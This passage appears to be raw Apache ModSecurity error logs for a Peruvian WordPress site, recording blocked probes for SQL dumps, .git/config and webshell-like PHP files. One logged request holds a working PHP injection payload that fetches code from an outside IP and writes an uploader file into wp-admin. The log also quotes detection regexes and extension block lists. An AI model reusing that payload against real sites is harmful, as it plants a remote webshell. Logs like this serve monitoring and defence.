content=\\x22text/html; charset=utf-8"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "investigacionperu.com"] [uri "/wp-login.php"] [unique_id "ZSPk6vNgMq3u5p7jLuIoDgAAAI4"] [Mon Oct 09 08:33:56.029359 2023] [:error] [pid 21884:tid 139839856908032] [client 104.35.37.244:56760] [client 104.35.37.244] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/maggie.sql"] [unique_id "ZSQBRPNgMq3u5p7jLuIoeQAAAJQ"] [Mon Oct 09 12:09:42.955984 2023] [:error] [pid 22139:tid 139840085776128] [client 137.117.89.55:60398] [client 137.117.89.55] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\b(?:f(?:tp_(?:nb_)?f?(?:ge|pu)t|get(?:s?s|c)|scanf|write|open|read)|gz(?:(?:encod|writ)e|compress|open|read)|s(?:ession_start|candir)|read(?:(?:gz)?file|dir)|move_uploaded_file|(?:proc_|bz)open|call_user_func)|\\\\$_(?:(?:pos|ge)t|session))\\\\b" at ARGS:vz. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "233"] [id "958976"] [rev "2"] [msg "PHP Injection Attack"] [data "Matched Data: fwrite found within ARGS:vz: $x=fwrite(fopen($_SERVER['DOCUMENT_ROOT'].'/wp-admin/css/colors/blue/uploader.php','w+'),file_get_contents('http://51.79.124.111/vz.txt'));echo \\x22aDriv4\\x22.$x;"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A6"] [tag "PCI/6.5.2"] [tag "WASCTC/WASC-25"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE4"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-admin/css/colors/blue/blue.php"] [unique_id "ZSQz1i-lV1T2v-tWJs_3ngAAAME"], referer: www.google.com [Mon Oct 09 13:53:33.973914 2023] [:error] [pid 21882:tid 139839940835072] [client 90.152.140.82:33864] [client 90.152.140.82] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/aaaaaa.sql"] [unique_id "ZSRMLVa_dqQsXv6ZsFKS8gAAAAo"] [Mon Oct 09 16:31:23.127205 2023] [:error] [pid 22139:tid 139839907264256] [client 83.150.7.243:35954] [client 83.150.7.243] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/ginger.sql"] [unique_id "ZSRxKy-lV1T2v-tWJs_5JwAAAM4"] [Mon Oct 09 17:06:19.900520 2023] [:error] [pid 22139:tid 139840060598016] [client 172.200.230.142:36520] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/cloud.php [Mon Oct 09 17:06:22.357123 2023] [:error] [pid 21884:tid 139839924049664] [client 172.200.230.142:36522] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/cloud.php [Mon Oct 09 19:08:48.442977 2023] [:error] [pid 16713:tid 139840094168832] [client 14.48.28.154:40820] [client 14.48.28.154] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/princess.sql"] [unique_id "ZSSWELplkTPe3JRCHchPUQAAAMA"] [Mon Oct 09 21:47:27.427534 2023] [:error] [pid 16713:tid 139839890478848] [client 185.162.16.58:43084] [client 185.162.16.58] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/joshua.sql"] [unique_id "ZSS7P7plkTPe3JRCHchQdwAAANA"] [Tue Oct 10 00:22:02.559307 2023] [autoindex:error] [pid 16548:tid 139839957620480] [client 20.25.139.25:45280] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/colors/coffee/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: www.google.com [Tue Oct 10 00:22:46.555163 2023] [autoindex:error] [pid 16548:tid 139839840122624] [client 20.25.139.25:45330] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: www.google.com [Tue Oct 10 00:22:47.308969 2023] [:error] [pid 16548:tid 139839932442368] [client 20.25.139.25:45332] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/cloud.php, referer: www.google.com [Tue Oct 10 00:22:49.445874 2023] [:error] [pid 16549:tid 139839865300736] [client 20.25.139.25:45334] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/xmrlpc.php, referer: www.google.com [Tue Oct 10 00:22:51.478904 2023] [:error] [pid 16549:tid 139839831729920] [client 20.25.139.25:45336] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/cloud.php, referer: www.google.com [Tue Oct 10 00:22:51.613963 2023] [:error] [pid 16549:tid 139839873693440] [client 20.25.139.25:45338] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/xmrlpc.php, referer: www.google.com [Tue Oct 10 00:22:53.583898 2023] [:error] [pid 16549:tid 139839840122624] [client 20.25.139.25:45340] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/license.php, referer: www.google.com [Tue Oct 10 00:23:14.782509 2023] [:error] [pid 16548:tid 139840060598016] [client 20.25.139.25:45366] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/moon.php, referer: www.google.com [Tue Oct 10 00:27:38.019089 2023] [:error] [pid 16548:tid 139839831729920] [client 90.12.29.187:45424] [client 90.12.29.187] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/cheese.sql"] [unique_id "ZSTgyrve_GMau5NS8tZPRQAAAFc"] [Tue Oct 10 09:05:50.793810 2023] [autoindex:error] [pid 32390:tid 140126504044288] [client 65.109.156.20:53448] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/maint/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-admin/maint/index.php [Tue Oct 10 09:05:54.470853 2023] [autoindex:error] [pid 32389:tid 140126587971328] [client 65.109.156.20:53456] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/maint/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-admin/maint/index.php [Tue Oct 10 11:03:47.880272 2023] [:error] [pid 32388:tid 140126571185920] [client 208.102.168.75:56346] [client 208.102.168.75] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/amanda.sql"] [unique_id "ZSV143jrjkeQtqg3F6an4gAAAAU"] [Tue Oct 10 12:24:19.244269 2023] [:error] [pid 32388:tid 140126445295360] [client 154.6.94.133:58488] [client 154.6.94.133] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:c(?:o(?:n(?:t(?:entsmartz|actbot/)|cealed defense|veracrawler)|mpatible(?: ;(?: msie|\\\\.)|-)|py(?:rightcheck|guard)|re-project/1.0)|h(?:ina(?: local browse 2\\\\.|claw)|e(?:rrypicker|esebot))|rescent internet toolpak)|w(?:e(?:b(?: (?:downloader|by ..." at REQUEST_HEADERS:User-Agent. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_35_bad_robots.conf"] [line "27"] [id "990012"] [rev "2"] [msg "Rogue web site crawler"] [data "panscient.com"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/AUTOMATION/MALICIOUS"] [tag "WASCTC/WASC-21"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "www.investigacionperu.com"] [uri "/robots.txt"] [unique_id "ZSWIw3jrjkeQtqg3F6aoJwAAABQ"] [Tue Oct 10 12:24:19.306671 2023] [:error] [pid 32388:tid 140126411724544] [client 154.6.94.133:58490] [client 154.6.94.133] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:c(?:o(?:n(?:t(?:entsmartz|actbot/)|cealed defense|veracrawler)|mpatible(?: ;(?: msie|\\\\.)|-)|py(?:rightcheck|guard)|re-project/1.0)|h(?:ina(?: local browse 2\\\\.|claw)|e(?:rrypicker|esebot))|rescent internet toolpak)|w(?:e(?:b(?: (?:downloader|by ..." at REQUEST_HEADERS:User-Agent. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_35_bad_robots.conf"] [line "27"] [id "990012"] [rev "2"] [msg "Rogue web site crawler"] [data "panscient.com"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/AUTOMATION/MALICIOUS"] [tag "WASCTC/WASC-21"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "www.investigacionperu.com"] [uri "/"] [unique_id "ZSWIw3jrjkeQtqg3F6aoKAAAABg"] [Tue Oct 10 12:24:19.319380 2023] [:error] [pid 32390:tid 140126520829696] [client 154.6.94.133:58492] [client 154.6.94.133] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:c(?:o(?:n(?:t(?:entsmartz|actbot/)|cealed defense|veracrawler)|mpatible(?: ;(?: msie|\\\\.)|-)|py(?:rightcheck|guard)|re-project/1.0)|h(?:ina(?: local browse 2\\\\.|claw)|e(?:rrypicker|esebot))|rescent internet toolpak)|w(?:e(?:b(?: (?:downloader|by ..." at REQUEST_HEADERS:User-Agent. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_35_bad_robots.conf"] [line "27"] [id "990012"] [rev "2"] [msg "Rogue web site crawler"] [data "panscient.com"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/AUTOMATION/MALICIOUS"] [tag "WASCTC/WASC-21"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "www.investigacionperu.com"] [uri "/robots.txt"] [unique_id "ZSWIw7DymfBHsun4MpZ7bgAAAIs"] [Tue Oct 10 12:24:20.344546 2023] [:error] [pid 32388:tid 140126529222400] [client 154.6.94.133:58494] [client 154.6.94.133] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:c(?:o(?:n(?:t(?:entsmartz|actbot/)|cealed defense|veracrawler)|mpatible(?: ;(?: msie|\\\\.)|-)|py(?:rightcheck|guard)|re-project/1.0)|h(?:ina(?: local browse 2\\\\.|claw)|e(?:rrypicker|esebot))|rescent internet toolpak)|w(?:e(?:b(?: (?:downloader|by ..." at REQUEST_HEADERS:User-Agent. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_35_bad_robots.conf"] [line "27"] [id "990012"] [rev "2"] [msg "Rogue web site crawler"] [data "panscient.com"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/AUTOMATION/MALICIOUS"] [tag "WASCTC/WASC-21"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "www.investigacionperu.com"] [uri "/"] [unique_id "ZSWIxHjrjkeQtqg3F6aoKQAAAAo"] [Tue Oct 10 12:24:20.376606 2023] [:error] [pid 32388:tid 140126562793216] [client 154.6.94.133:58496] [client 154.6.94.133] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:c(?:o(?:n(?:t(?:entsmartz|actbot/)|cealed defense|veracrawler)|mpatible(?: ;(?: msie|\\\\.)|-)|py(?:rightcheck|guard)|re-project/1.0)|h(?:ina(?: local browse 2\\\\.|claw)|e(?:rrypicker|esebot))|rescent internet toolpak)|w(?:e(?:b(?: (?:downloader|by ..." at REQUEST_HEADERS:User-Agent. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_35_bad_robots.conf"] [line "27"] [id "990012"] [rev "2"] [msg "Rogue web site crawler"] [data "panscient.com"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/AUTOMATION/MALICIOUS"] [tag "WASCTC/WASC-21"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/robots.txt"] [unique_id "ZSWIxHjrjkeQtqg3F6aoKgAAAAY"] [Tue Oct 10 12:24:20.431857 2023] [:error] [pid 32388:tid 140126436902656] [client 154.6.94.133:58498] [client 154.6.94.133] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:c(?:o(?:n(?:t(?:entsmartz|actbot/)|cealed defense|veracrawler)|mpatible(?: ;(?: msie|\\\\.)|-)|py(?:rightcheck|guard)|re-project/1.0)|h(?:ina(?: local browse 2\\\\.|claw)|e(?:rrypicker|esebot))|rescent internet toolpak)|w(?:e(?:b(?: (?:downloader|by ..." at REQUEST_HEADERS:User-Agent. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_35_bad_robots.conf"] [line "27"] [id "990012"] [rev "2"] [msg "Rogue web site crawler"] [data "panscient.com"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/AUTOMATION/MALICIOUS"] [tag "WASCTC/WASC-21"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/contacto/"] [unique_id "ZSWIxHjrjkeQtqg3F6aoKwAAABU"] [Tue Oct 10 12:24:20.467298 2023] [:error] [pid 32388:tid 140126453688064] [client 154.6.94.133:58500] [client 154.6.94.133] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:c(?:o(?:n(?:t(?:entsmartz|actbot/)|cealed defense|veracrawler)|mpatible(?: ;(?: msie|\\\\.)|-)|py(?:rightcheck|guard)|re-project/1.0)|h(?:ina(?: local browse 2\\\\.|claw)|e(?:rrypicker|esebot))|rescent internet toolpak)|w(?:e(?:b(?: (?:downloader|by ..." at REQUEST_HEADERS:User-Agent. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_35_bad_robots.conf"] [line "27"] [id "990012"] [rev "2"] [msg "Rogue web site crawler"] [data "panscient.com"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/AUTOMATION/MALICIOUS"] [tag "WASCTC/WASC-21"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "www.investigacionperu.com"] [uri "/"] [unique_id "ZSWIxHjrjkeQtqg3F6aoLAAAABM"] [Tue Oct 10 12:24:21.486547 2023] [:error] [pid 32389:tid 140126478866176] [client 154.6.94.133:58502] [client 154.6.94.133] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:c(?:o(?:n(?:t(?:entsmartz|actbot/)|cealed defense|veracrawler)|mpatible(?: ;(?: msie|\\\\.)|-)|py(?:rightcheck|guard)|re-project/1.0)|h(?:ina(?: local browse 2\\\\.|claw)|e(?:rrypicker|esebot))|rescent internet toolpak)|w(?:e(?:b(?: (?:downloader|by ..." at REQUEST_HEADERS:User-Agent. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_35_bad_robots.conf"] [line "27"] [id "990012"] [rev "2"] [msg "Rogue web site crawler"] [data "panscient.com"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/AUTOMATION/MALICIOUS"] [tag "WASCTC/WASC-21"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "www.investigacionperu.com"] [uri "/"] [unique_id "ZSWIxYtkvCJOAjXo0CIlOgAAAFA"] [Tue Oct 10 12:24:23.477651 2023] [:error] [pid 521:tid 140126675785472] [client 154.6.94.133:58504] [client 154.6.94.133] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:c(?:o(?:n(?:t(?:entsmartz|actbot/)|cealed defense|veracrawler)|mpatible(?: ;(?: msie|\\\\.)|-)|py(?:rightcheck|guard)|re-project/1.0)|h(?:ina(?: local browse 2\\\\.|claw)|e(?:rrypicker|esebot))|rescent internet toolpak)|w(?:e(?:b(?: (?:downloader|by ..." at REQUEST_HEADERS:User-Agent. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_35_bad_robots.conf"] [line "27"] [id "990012"] [rev "2"] [msg "Rogue web site crawler"] [data "panscient.com"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/AUTOMATION/MALICIOUS"] [tag "WASCTC/WASC-21"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "www.investigacionperu.com"] [uri "/"] [unique_id "ZSWIxwqfrSxyBIVUChBuQwAAAME"] [Tue Oct 10 12:24:24.514493 2023] [:error] [pid 32390:tid 140126487258880] [client 154.6.94.133:58506] [client 154.6.94.133] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:c(?:o(?:n(?:t(?:entsmartz|actbot/)|cealed defense|veracrawler)|mpatible(?: ;(?: msie|\\\\.)|-)|py(?:rightcheck|guard)|re-project/1.0)|h(?:ina(?: local browse 2\\\\.|claw)|e(?:rrypicker|esebot))|rescent internet toolpak)|w(?:e(?:b(?: (?:downloader|by ..." at REQUEST_HEADERS:User-Agent. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_35_bad_robots.conf"] [line "27"] [id "990012"] [rev "2"] [msg "Rogue web site crawler"] [data "panscient.com"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/AUTOMATION/MALICIOUS"] [tag "WASCTC/WASC-21"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "www.investigacionperu.com"] [uri "/"] [unique_id "ZSWIyLDymfBHsun4MpZ7bwAAAI8"] [Tue Oct 10 13:55:34.911610 2023] [:error] [pid 521:tid 140126520829696] [client 162.247.74.213:60604] [client 162.247.74.213] ModSecurity: Access denied with code 403 (phase 2). Pattern match ".+application/x-shockwave-flash|image/svg\\\\+xml|text/(css|html|ecmascript|javascript|vbscript|x-(javascript|scriptlet|vbscript)).+" at ARGS:wp_submit. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_xss_attacks.conf"] [line "309"] [id "973302"] [rev "2"] [msg "XSS Attack Detected"] [data "Matched Data: text/html; charset=utf-8 found within ARGS:wp_submit: tp-equiv=\\x22content-type\\x22 content=\\x22text/html; charset=utf-8"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "investigacionperu.com"] [uri "/wp-login.php"] [unique_id "ZSWeJgqfrSxyBIVUChBvTgAAAMs"] 2023/10/10 15:42:17 [error] 32248#32248: *336315 access forbidden by rule, client: 172.232.121.24, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" [Tue Oct 10 16:28:02.736532 2023] [:error] [pid 32390:tid 140126504044288] [client 195.235.98.146:34870] [client 195.235.98.146] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/love.sql"] [unique_id "ZSXB4rDymfBHsun4MpZ8lwAAAI0"] [Tue Oct 10 19:10:12.559332 2023] [:error] [pid 521:tid 140126554400512] [client 90.12.29.187:38174] [client 90.12.29.187] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity 